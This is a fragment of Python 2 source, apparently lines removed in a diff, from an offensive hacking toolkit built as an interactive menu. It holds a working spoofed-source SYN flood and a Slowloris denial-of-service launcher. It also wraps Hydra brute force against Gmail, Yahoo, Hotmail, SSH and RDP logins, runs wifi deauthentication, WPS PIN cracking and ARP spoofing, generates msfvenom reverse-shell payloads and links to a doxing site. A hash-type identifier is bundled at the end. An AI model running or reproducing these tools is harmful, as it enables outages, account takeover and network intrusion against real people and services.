os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - 